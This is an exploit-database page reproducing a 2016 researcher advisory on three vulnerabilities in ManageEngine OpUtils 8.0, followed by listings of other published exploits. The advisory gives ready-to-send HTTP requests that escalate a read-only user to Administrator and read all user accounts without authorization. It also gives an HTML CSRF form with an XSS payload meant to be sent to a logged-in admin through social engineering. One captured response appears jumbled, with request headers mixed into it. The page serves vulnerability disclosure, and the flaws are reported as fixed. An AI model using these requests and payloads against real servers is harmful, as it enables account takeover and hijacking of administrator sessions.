Menu

Search for hundreds of thousands of exploits

"ManageEngine OPutils 8.0 - Multiple Vulnerabilities"

Author

Exploit author

"Kaustubh G. Padwad"

Platform

Exploit platform

multiple

Release date

Exploit published date

2016-02-16

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
===================================================================================
Privilege escalation Vulnerability in ManageEngine oputils
===================================================================================

Overview
========

Title:- Privilege escalation Vulnerability in ManageEngine oputils
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: ManageEngine oputils
Tested Version: : oputils 8.0
Severity: HIGH

Advisory ID
============
2016-05-Manage_Engine

About the Product:
==================
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.

Description:
============

This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application.

Vulnerability Class:
====================
Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization

How to Reproduce: (POC):
========================

* you should have Read only user  on OpUtils

* login with that account to get api key something like 375e0fa0-0bb3-479c-a646-debb90a1f5f0

* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :)

POC
====

Burp Requst
-----------
POST /oputilsapi/admin?key=375e0fa0-0bb3-479c-a646-debb90a1f5f0 HTTP/1.1

Host: 192.168.1.10:7080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp

Content-Length: 151

Cookie: OPUTILSJSESSIONID=AC6E9B2C01FDDD5E27C245BC6F31C032; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache



v=1&format=json&operation=DELETE_OR_MODIFY_USER&action1=MODIFY_USER&userInAction=kk&userRole=Administrator&userAuthType=Local&contactinfoID=2&loginID=2


Response
--------
HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Set-Cookie: OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66; Expires=Thu, 01-Jan-1970 00:00:10 GMT

Set-Cookie: OPUTILSJSESSIONID=184C572A3D2E17EEC3B78C027B925421; Path=/

Content-Type: application/json;charset=UTF-8

Content-Length: 90

Date: Thu, 04 Feb 2016 13:27:09 GMT



{"input":"{newUserName=MODIFY_USER, userInAction=kk, domainName=null}","status":"Success"}


Mitigation
==========
Upgrade to next Service pack

Disclosure:
===========
04-Feb-2016 Repoerted to vendor
11-Feb-2016 Fixed By vendor

################################################################################

====================================================================================================
Missing Function Level Access control Vulnerability in OPutils
====================================================================================================

Overview
========

Title:- Missing Function Level Access control Vulnerability in ManageEngine OpUtils
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: OPUTILS
Tested Version: : OPUTILS 8.0
Severity: Medium

Advisory ID
============
2016-06-Manage_Engine

Description:
============

This Missing Function Level Access Control vulnerability enables an Normal user to execute the Adinisitative Task.

Vulnerability Class:
====================
2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control

How to Reproduce: (POC):
========================

* Get The administrative Task URL from either demo site or download locally

* Now Login With Normal User

* Paste the below requst or any other for Ex. http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS

POC
====

Burp Requst
-----------
GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1

Host: 192.168.1.10:7080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0

Accept: */*

Accept-Language: en-US,en;q=0.5



Response
--------


HTTP/1.1 200 OK
erver: Apache-Coyote/1.1

Content-Type: application/json;charset=UTF-8

Content-Length: 589

Date: Thu, 04 Feb 2016 14:28:25 GMT



{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"}
Server: Apache-Coyote/1.1

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Max-Age: 5000

Content-Type: application/json;charset=UTF-8

Date: Sat, 30 Jan 2016 21:39:03 GMT

Content-Length: 19



{"resolved":true}

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp

Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371

Connection: keep-alive

Mitigation
==========
Upgrade to NextService Pack

Disclosure:
===========
04-Feb-2016 Repoerted to vendor
11-Feb-2016 Fixed By Vendor

################################################################################

===============================================================================
CSRF and XXS In Manage Engine oputils
===============================================================================

Overview
========

* Title : CSRF  and XSS In Manage Engine OPutils
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://www.manageengine.com/products/oputils/
* Severity: HIGH
* Version Affected: Version 8.0
* Version Tested : Version 8.0
* version patched:

Advisory ID
============
2016-01-Manage_Engine

Description
===========

Vulnerable Parameter
--------------------
1. RouterName
2. action Form
3. selectedSwitchTab
4. ipOrHost
5. alertMsg
6. hostName
7. switchID
8. oidString

About Vulnerability
-------------------
This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting       (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)
=========================

* Add follwing code to webserver and send that malicious link to application Admin.
* The admin should be loggedin when he clicks on the link.
* Soical enginering might help here

For Example :- Device password has been changed click here to reset

####################CSRF COde#######################
<html>

  <body>

    <form action="http://192.168.1.10:7080/DeviceExplorer.cc">

      <input type="hidden" name="RouterName" value="kaus"><img&#32;src&#61;a&#32;onerror&#61;confirm&#40;"Kaustubh"&#41;>tubh" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>


Mitigation
==========
Upgrade to next service pack

Change Log
==========

Disclosure
==========
28-January-2016 Reported to Developer
28-January-2016 Acknodlagement from developer
11-February-2016 Fixed by vendor ()

credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery" webapps windows "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected